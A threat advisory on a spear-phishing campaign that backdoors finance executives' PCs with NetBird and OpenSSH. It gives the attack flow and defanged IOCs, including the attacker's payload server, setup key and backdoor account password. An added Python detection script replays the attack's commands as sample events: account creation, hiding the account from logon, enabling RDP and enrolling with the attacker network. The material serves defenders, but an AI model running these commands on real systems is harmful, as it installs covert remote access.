Trellix researchers uncovered a sophisticated spear-phishing campaign targeting CFOs and other finance executives across multiple industries. The campaign combined social engineering with a carefully staged, multi-stage delivery chain to install NetBird and OpenSSH on victims' machines, giving the attackers a covert, persistent remote-access path. The lure was an email from a fake Rothschild & Co recruiter, and the phishing pages sat behind a custom CAPTCHA that kept automated scanners from reaching the payload. The chain delivered a malicious VBS script that installed NetBird and OpenSSH, created a hidden local administrator account, and enabled RDP, leaving the attackers with encrypted remote access to the compromised systems.
Severity Level: Critical
Attack Flow: From Phish To Persistent Remote Access
- Initial Contact – Spear-Phishing Email:
  - Subject Line: Rothschild & Co leadership opportunity (Confidential)
  - Sender: Spoofed email claiming to be from a Rothschild & Co recruiter
  - Objective: Entice the recipient (a CFO or finance executive) to click a link to what is presented as a PDF brochure for the job opportunity.
- Phishing Link & CAPTCHA Evasion:
  - Malicious Link: Redirects to a Firebase-hosted phishing page
    - hxxps://googl-6c11f.firebaseapp[.]com/job/file-846873865383.html
  - CAPTCHA Trick: A custom CAPTCHA built in JavaScript stops automated crawlers and URL scanners from reaching the payload, so the page looks clean to reputation services.
  - After CAPTCHA: The victim is redirected to a second Firebase domain to download a ZIP file
    - hxxps://googl-6c11f.web[.]app/job/9867648797586_Scan_15052025-736574.html
- ZIP Archive & First-Stage VBS Script:
  - ZIP Name: Rothschild_&Co-6745763.zip
  - Contains: Rothschild&_Co-6745763.vbs (VBS dropper)
  - Execution:
    - Creates the folder C:\temper\
    - Downloads the next-stage payload from: hxxp://192[.]3[.]95[.]152/cloudshare/atr/pull.pdf (served with a .pdf extension, but it is a VBS script)
    - Saves it as pull.vbs and launches it through wscript.exe with the runas verb; this triggers a UAC prompt and, if the user accepts it, the second stage runs with administrator rights
- Second-Stage VBS Script:
  - Payload URL: hxxp://192[.]3[.]95[.]152/cloudshare/atr/trm
  - Actions:
    - Saves the download as trm.zip
    - Extracts two MSI installers:
      - NetBird.msi (WireGuard-based overlay network / remote access client)
      - OpenSSH.msi
    - Installs both silently via msiexec
    - Enrolls the host into the attackers' NetBird network with the setup key E48E4A70-4CF4-4A77-946B-C8E50A60855A
- Establishing Persistence:
  - Creates a hidden local administrator account:
    - Username: user
    - Password: Bs@202122
  - Configures the system for remote access:
    - Enables Remote Desktop (RDP)
    - Adds Windows Firewall rules allowing RDP
    - Sets the netbird and sshd services to start automatically
    - Creates a scheduled task that restarts NetBird at boot
  - Deletes desktop shortcuts so the newly installed tools are not obvious to the user
Affected Regions:
UK, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, Brazil
Affected Sectors:
Banking, Energy, Insurance, Investment firms, Mining, Semiconductor.
Recommendations:
- Treat unsolicited “opportunities” or cold-recruitment emails with skepticism, especially when they come with a ZIP or obscure download link.
- Never bypass security warnings to enable content or scripts from downloads.
- Report unusual contact attempts to security teams, even if the email seems “harmless.” Early reporting is often what prevents compromise.
- Deploy EDR across the estate and triage alerts for suspicious command or script execution (PowerShell, cmd.exe, MSHTA, WScript) and for suspicious user-account creation, especially when the new user is immediately added to a privileged group such as Administrators.
- Vigilantly track instances of wscript.exe or powershell.exe originating from non-IT users, especially C-suite members.
- Regularly audit MSIExec activity on end-user devices to detect any unusual installations, particularly those involving script-driven behaviors.
- Implement policy rules to flag and investigate uncommon archive delivery patterns at the mail gateway and on endpoints, in particular ZIP files that contain VBS or other script files.
- Maintain visibility over new local accounts added to the Administrators group, particularly those with generic usernames like “user”.
- Block the IOCs at the respective controls (mail gateway, web proxy, DNS, EDR). The full IOC list is published as a VirusTotal collection: https://www.virustotal.com/gui/collection/525dd4d309a4c2f6e2935724af1ed089c4aceb1c026ad57ea9e7f2b4a886a6d9/iocs
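The following Python script is an added example and is not code from Trellix, NetBird or this advisory. It turns the attack flow above and the EDR recommendations into process-creation detection rules (the kind of logic a SOC would run over Sysmon EID 1 or EDR telemetry) and evaluates them over constructed sample events that mirror the chain. Only the setup key, the C:\temper path, the file names and the account name come from the advisory; the CORP\cfo.jane and CORP\it.bob accounts, the EXEC_WATCHLIST, the exact command lines and the benign control events are assumptions, and the Winlogon SpecialAccounts\UserList rule is one common way to hide an account from the logon screen that the advisory does not name. The chain_matches function correlates per user so that a single alert (an IT admin running msiexec /qn) does not page anyone, while a script host followed by a silent MSI install and any persistence step does.

```python
"""Process-creation detection rules for the NetBird/OpenSSH chain (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Set

@dataclass
class ProcEvent:
    """Fields of a Sysmon EID 1 / EDR process-creation record that the rules use."""
    user: str
    image: str
    cmdline: str
    parent_image: str

@dataclass
class Finding:
    rule: str
    severity: str
    user: str
    cmdline: str

# Setup key reported in the advisory: any enrolment with a setup key fires, this exact value is critical.
KNOWN_SETUP_KEY = "E48E4A70-4CF4-4A77-946B-C8E50A60855A"
EXEC_WATCHLIST = {"corp\\cfo.jane"}  # hypothetical finance / C-suite accounts that never run script hosts
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}

def base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def cmd(pattern: str) -> Callable[[ProcEvent], bool]:
    rx = re.compile(pattern, re.I)
    return lambda e: rx.search(e.cmdline) is not None

def img(*names: str) -> Callable[[ProcEvent], bool]:
    return lambda e: base(e.image) in names

# (rule name, base severity, predicates that must all hold); tune paths and parent lists to your estate.
RULES = [
    ("script_host_user_writable_path", "high",
     [img("wscript.exe", "cscript.exe"), cmd(r"\\(users|temper)\\.*\.(vbs|vbe|js|wsf)\b")]),
    ("silent_msi_from_script_host", "critical",
     [img("msiexec.exe"), lambda e: base(e.parent_image) in SCRIPT_HOSTS, cmd(r"\s/(qn|quiet)\b")]),
    ("netbird_enrolment_with_setup_key", "high", [img("netbird.exe"), cmd(r"\bup\b.*--setup-key")]),
    ("local_admin_account_added", "high", [img("net.exe", "net1.exe"),
     cmd(r"\b(user\s+\S+\s+\S+\s+/add|localgroup\s+administrators\s+\S+\s+/add)")]),
    # Assumed hiding method (the advisory says "hidden" without naming one):
    # Winlogon\SpecialAccounts\UserList\<name> = 0 removes the account from the logon screen.
    ("account_hidden_from_logon_ui", "high", [img("reg.exe"), cmd(r"SpecialAccounts\\UserList.*\s/d\s+0\b")]),
    ("rdp_enabled_via_registry", "high", [img("reg.exe"), cmd(r"fDenyTSConnections.*\s/d\s+0\b")]),
    ("firewall_opened_for_rdp", "medium", [img("netsh.exe"), cmd(r"advfirewall.*remote desktop.*enable=yes")]),
    ("remote_access_service_autostart", "medium", [img("sc.exe"), cmd(r"config\s+(netbird|sshd)\s+start=\s*auto")]),
    ("scheduled_task_for_remote_tool", "medium", [img("schtasks.exe"), cmd(r"/create.*netbird")]),
]
PERSISTENCE = {name for name, _, _ in RULES[2:]}

def evaluate(events: List[ProcEvent]) -> List[Finding]:
    out: List[Finding] = []
    for e in events:
        for name, sev, preds in RULES:
            if not all(p(e) for p in preds):
                continue
            if name == "netbird_enrolment_with_setup_key" and KNOWN_SETUP_KEY.lower() in e.cmdline.lower():
                sev = "critical"  # exact IOC match
            elif sev == "medium" and e.user.lower() in EXEC_WATCHLIST:
                sev = "high"  # the same command on an executive's laptop deserves a faster look
            out.append(Finding(name, sev, e.user, e.cmdline))
    return out

def chain_matches(findings: List[Finding]) -> Set[str]:
    """Users showing the whole pattern: script host -> silent MSI -> at least one persistence step."""
    rules_by_user: Dict[str, Set[str]] = {}
    for f in findings:
        rules_by_user.setdefault(f.user.lower(), set()).add(f.rule)
    needed = {"script_host_user_writable_path", "silent_msi_from_script_host"}
    return {u for u, r in rules_by_user.items() if needed <= r and r & PERSISTENCE}

# Constructed sample telemetry modelled on the chain above (not captured data).
S32, WS = r"C:\Windows\System32", r"C:\Windows\System32\wscript.exe"
CFO, IT = "CORP\\cfo.jane", "CORP\\it.bob"
SAMPLE_EVENTS = [
    ProcEvent(CFO, S32 + r"\wscript.exe", r'wscript.exe "C:\Users\cfo.jane\Downloads\Rothschild&_Co-6745763.vbs"', r"C:\Windows\explorer.exe"),
    ProcEvent(CFO, S32 + r"\wscript.exe", r'wscript.exe "C:\temper\pull.vbs"', WS),
    ProcEvent(CFO, S32 + r"\msiexec.exe", r'msiexec.exe /i "C:\temper\NetBird.msi" /qn', WS),
    ProcEvent(CFO, S32 + r"\msiexec.exe", r'msiexec.exe /i "C:\temper\OpenSSH.msi" /qn', WS),
    ProcEvent(CFO, r"C:\Program Files\NetBird\netbird.exe", "netbird.exe up --setup-key " + KNOWN_SETUP_KEY, WS),
    ProcEvent(CFO, S32 + r"\net.exe", "net user user Bs@202122 /add", WS),
    ProcEvent(CFO, S32 + r"\net.exe", "net localgroup Administrators user /add", WS),
    ProcEvent(CFO, S32 + r"\reg.exe", r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v user /t REG_DWORD /d 0 /f', WS),
    ProcEvent(CFO, S32 + r"\reg.exe", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f', WS),
    ProcEvent(CFO, S32 + r"\netsh.exe", 'netsh advfirewall firewall set rule group="remote desktop" new enable=yes', WS),
    ProcEvent(CFO, S32 + r"\sc.exe", "sc config sshd start= auto", WS),
    ProcEvent(CFO, S32 + r"\schtasks.exe", r'schtasks /create /tn NetBird /tr "C:\Program Files\NetBird\netbird.exe up" /sc onstart /ru SYSTEM', WS),
    # Benign activity that must stay quiet: IT pushing a package from an admin shell, a logon script in a system path.
    ProcEvent(IT, S32 + r"\msiexec.exe", r'msiexec.exe /i "\\fs01\pkgs\7z.msi" /qn', S32 + r"\cmd.exe"),
    ProcEvent(IT, S32 + r"\wscript.exe", r'wscript.exe "C:\Scripts\map_drives.vbs"', S32 + r"\cmd.exe"),
]
```

Run `evaluate(SAMPLE_EVENTS)` and then `chain_matches(...)` on the result: the twelve CFO events each produce one finding (the setup-key enrolment and the two silent installs at critical), the two IT events produce none, and only the CFO account satisfies the full chain. The regexes deliberately key on the command-line shapes the advisory describes (reg add /d 0, sc config start= auto, msiexec /qn under a script host); a PowerShell-only variant of the same steps would need parallel patterns.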
MITRE ATT&CK
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Phishing: Spear-phishing Link | T1566.002 |
| Execution | User Execution: Malicious File (open ZIP / run VBS) | T1204.002 |
| Execution | Command and Scripting Interpreter: Visual Basic | T1059.005 |
| Command & Control | Ingress Tool Transfer | T1105 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Defense Evasion / Execution | System Binary Proxy Execution: Msiexec | T1218.007 |
| Persistence | Create or Modify System Process: Windows Service | T1543.003 |
| Command & Control | Remote Access Tools: Remote Desktop Software | T1219.002 |
| Persistence | Scheduled Task/Job: Scheduled Task | T1053.005 |
| Persistence | Create Account: Local Account | T1136.001 |
| Privilege Escalation | Abuse Elevation Control Mechanism (runas verb; elevation depends on the user accepting the UAC prompt) | T1548.002 |
| Defense Evasion | Modify Registry | T1112 |
| Defense Evasion | Impair Defenses: Disable or Modify System Firewall | T1562.004 |
| Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 |
| Lateral Movement / C2 | Remote Services: SSH | T1021.004 |
Source:
- https://www.trellix.com/blogs/research/cfo-spear-phishing-netbird-attack/
- https://netbird.io/knowledge-hub/netbird-response-to-spear-phishing-campaign-targeting-financial-executives